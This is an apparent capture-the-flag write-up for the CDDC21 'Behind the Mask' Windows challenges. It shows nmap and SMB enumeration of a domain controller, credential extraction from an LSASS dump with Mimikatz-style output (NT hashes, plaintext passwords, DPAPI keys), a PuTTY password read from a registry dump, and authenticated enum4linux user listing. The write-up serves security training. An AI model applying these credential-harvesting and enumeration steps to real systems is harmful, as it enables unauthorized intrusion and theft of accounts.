Behind the Mask (Windows)

Hello Guest

Port scan:
1
└─# nmap -sC -sV -v -Pn 54.255.213.169
2
PORT STATE SERVICE VERSION
3
53/tcp open domain Simple DNS Plus
4
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-06-24 02:10:15Z)
5
135/tcp open msrpc Microsoft Windows RPC
6
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
7
445/tcp open microsoft-ds Windows Server 2016 Datacenter 14393 microsoft-ds (workgroup: GDC)
8
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
9
3389/tcp open ms-wbt-server Microsoft Terminal Services
10
| rdp-ntlm-info:
11
| Target_Name: GDC
12
| NetBIOS_Domain_Name: GDC
13
| NetBIOS_Computer_Name: GDC-DC-J
14
| DNS_Domain_Name: gdc.local
15
| DNS_Computer_Name: GDC-DC-J.gdc.local
16
| DNS_Tree_Name: gdc.local
17
| Product_Version: 10.0.14393
18
|_ System_Time: 2021-06-24T02:10:15+00:00
19
| ssl-cert: Subject: commonName=GDC-DC-J.gdc.local
20
| Issuer: commonName=GDC-DC-J.gdc.local
21
| Public Key type: rsa
22
| Public Key bits: 2048
23
| Signature Algorithm: sha256WithRSAEncryption
24
| Not valid before: 2021-06-16T15:44:01
25
| Not valid after: 2021-12-16T15:44:01
26
| MD5: 4af0 4092 e460 3e66 22e0 bfd2 201d ab7a
27
|_SHA-1: 7c57 5c74 5cc7 ea3e a9ee 0d19 159f 4638 6bcf b1ec
28
|_ssl-date: 2021-06-24T02:10:55+00:00; 0s from scanner time.
29
Service Info: Host: GDC-DC-J; OS: Windows; CPE: cpe:/o:microsoft:windows
30
​
31
Host script results:
32
|_clock-skew: mean: 0s, deviation: 1s, median: 0s
33
| smb-os-discovery:
34
| OS: Windows Server 2016 Datacenter 14393 (Windows Server 2016 Datacenter 6.3)
35
| Computer name: GDC-DC-J
36
| NetBIOS computer name: GDC-DC-J\x00
37
| Domain name: gdc.local
38
| Forest name: gdc.local
39
| FQDN: GDC-DC-J.gdc.local
40
|_ System time: 2021-06-24T02:10:18+00:00
41
| smb-security-mode:
42
| account_used: guest
43
| authentication_level: user
44
| challenge_response: supported
45
|_ message_signing: required
46
| smb2-security-mode:
47
| 2.02:
48
|_ Message signing enabled and required
49
| smb2-time:
50
| date: 2021-06-24T02:10:19
51
|_ start_date: 2021-06-22T10:01:52
Copied!

SMB Shares

1
└─# smbclient -U '' -L \\\\54.255.213.169
2
Enter WORKGROUP\'s password:
3
​
4
Sharename Type Comment
5
--------- ---- -------
6
ADMIN$ Disk Remote Admin
7
Backup Disk
8
C$ Disk Default share
9
Forensics1 Disk
10
Forensics2 Disk
11
IPC$ IPC Remote IPC
12
NETLOGON Disk Logon server share
13
SYSVOL Disk Logon server share
14
Users Disk
15
SMB1 disabled -- no workgroup available
Copied!
Connect to Backup share with no username.
CDDC21{0LLHE_Gue$T}

Old Memories

Credentials: alexander.p:v#X1nOLqPZ
Access Forensics1 using these credentials. There is an LSASS dump, which we can use Mimikatz to interpret. This gives us the credentials John:#johnIStheBEST!.
1
== MSV ==
2
Username: Flag
3
Domain: DESKTOP-2QFHHML
4
LM: NA
5
NT: 596c4994f88d93d0718bdea487092f11
6
SHA1: 45b9d6c67c871a7c763e3a062c8e0684415e6834
7
== WDIGEST [e0b3a]==
8
username Flag
9
domainname DESKTOP-2QFHHML
10
password CDDC21{lsa$_DUMP_password}
11
== Kerberos ==
12
Username: Flag
13
Domain: DESKTOP-2QFHHML
14
Password: None
15
== WDIGEST [e0b3a]==
16
username Flag
17
domainname DESKTOP-2QFHHML
18
password CDDC21{lsa$_DUMP_password}
19
== DPAPI [e0b3a]==
20
luid 920378
21
key_guid 9c3ff7d7-c6c0-4d8d-8c0d-7dc7428f80a1
22
masterkey 6e95c4172045ea74162063f33065449b683b612d2c52b8db502b8ece05311ff16e18b4a1d737e5fc93eb0882576bc17f85f2f70e0344b6db49600e9a461a2a8f
23
sha1_masterkey 06cdbed57b14937ac2008d24a56a423f919a1eb7
24
​
25
== LogonSession ==
26
authentication_id 195058 (2f9f2)
27
session_id 1
28
username John
29
domainname DESKTOP-2QFHHML
30
logon_server DESKTOP-2QFHHML
31
logon_time 2021-06-10T06:44:43.890166+00:00
32
sid S-1-5-21-2198713953-2006436724-2838398043-1001
33
luid 195058
34
== MSV ==
35
Username: John
36
Domain: DESKTOP-2QFHHML
37
LM: NA
38
NT: 53bb900f229aa32d546f54523a96de67
39
SHA1: 1075eeefce15aa2008f2e0594babccc09cdf5d4b
40
== WDIGEST [2f9f2]==
41
username John
42
domainname DESKTOP-2QFHHML
43
password #johnIStheBEST!
44
== Kerberos ==
45
Username: John
46
Domain: DESKTOP-2QFHHML
47
Password: None
48
== WDIGEST [2f9f2]==
49
username John
50
domainname DESKTOP-2QFHHML
51
password #johnIStheBEST!
52
== DPAPI [2f9f2]==
53
luid 195058
54
key_guid 44b05868-2d03-4f04-a2ba-fedd6e3b08f5
55
masterkey 359eee0b2409c2d331ece3c70d71b8987d27a6ecf3e08848efeea3eda14c05a044f6efd3201a30cbd7e7c64fdcbb500453b22dd8cc322b2e0c3b0ff7b2850877
56
sha1_masterkey 68e0bf11f62251c47a0fa84869946e72224930f5
Copied!
Accessing Forensics2 as John gives us the flag.
CDDC21{lsa$_DUMP_password}

Register

We are given a registry dump. There is a PuTTy password stored in the registry.
1
[HKEY_USERS\S-1-5-21-2198713953-2006436724-2838398043-1001\SOFTWARE\SimonTatham\PuTTY\Sessions\flag]
2
​
3
...
4
​
5
"ProxyPassword"="iS_Putty_s3cure?!"
6
​
7
...
Copied!
The flag is CDDC21{iS_Putty_s3cure?!}

Last Note

Listing all the domain users, we find the flag in the description of henry.s.
1
└─$ enum4linux -u alexander.p -p "v#X1nOLqPZ" -U 54.255.213.169
2
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Jun 24 00:22:40 2021
3
​
4
==========================
5
| Target Information |
6
==========================
7
Target ........... 54.255.213.169
8
RID Range ........ 500-550,1000-1050
9
Username ......... 'alexander.p'
10
Password ......... 'v#X1nOLqPZ'
11
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
12
​
13
...
14
​
15
===============================
16
| Users on 54.255.213.169 |
17
===============================
18
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
19
index: 0xfbc RID: 0x1f4 acb: 0x00000010 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
20
index: 0x10ab RID: 0x461 acb: 0x00000010 Account: adrian.c Name: Collins, Adrian Desc: Programer at GDC
21
index: 0x10ae RID: 0x464 acb: 0x00000010 Account: alexander.p Name: Perry, Alexander Desc: Help Desk
22
index: 0x10a9 RID: 0x45f acb: 0x00000010 Account: andy.g Name: Goode, Andrew Desc: Algorithms at GDC
23
index: 0x10a8 RID: 0x45e acb: 0x00000010 Account: ci_admin Name: Admin, CI Desc: Continuous Integration Admin
24
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
25
index: 0xfbd RID: 0x1f5 acb: 0x00000214 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
26
index: 0x10a2 RID: 0x458 acb: 0x00000010 Account: henry.s Name: Stewart, Henry Desc: CDDC21{We!!_D0NE}
27
index: 0x10a3 RID: 0x459 acb: 0x00000010 Account: jacob.c Name: Coleman, Jacob Desc: Customer Success Manager
28
index: 0x10b3 RID: 0x468 acb: 0x00000210 Account: john Name: john Desc: (null)
29
index: 0x10ac RID: 0x462 acb: 0x00000010 Account: john.m Name: Miller, John Desc: Programer at GDC
30
index: 0x10aa RID: 0x460 acb: 0x00000010 Account: justin.t Name: Tuck, Justin Desc: Programer at GDC
31
index: 0xff5 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
32
index: 0x10a5 RID: 0x45b acb: 0x00000010 Account: marcus.w Name: Wright, Marcus Desc: Researcher at GDC
33
index: 0xfbf RID: 0x3f0 acb: 0x00000210 Account: root Name: root Desc: (null)
34
index: 0x10ad RID: 0x463 acb: 0x00000010 Account: ryan.b Name: Butler, Ryan Desc: Help Desk Manager
35
index: 0x10a4 RID: 0x45a acb: 0x00000010 Account: serena.k Name: Kagan, Serena Desc: Researcher at GDC
36
index: 0x10af RID: 0x465 acb: 0x00000010 Account: svc_admin Name: , SVC Desc: Service admin account
37
index: 0x10a6 RID: 0x45c acb: 0x00000010 Account: thomas.p Name: Parnell, Thomas Desc: Researcher at GDC
38
index: 0x10a7 RID: 0x45d acb: 0x00000010 Account: vick.c Name: Chamberlain, Vick Desc: Researcher at GDC
39
​
40
...
Copied!
The flag is CDDC21{We!!_D0NE}
Last modified 5mo ago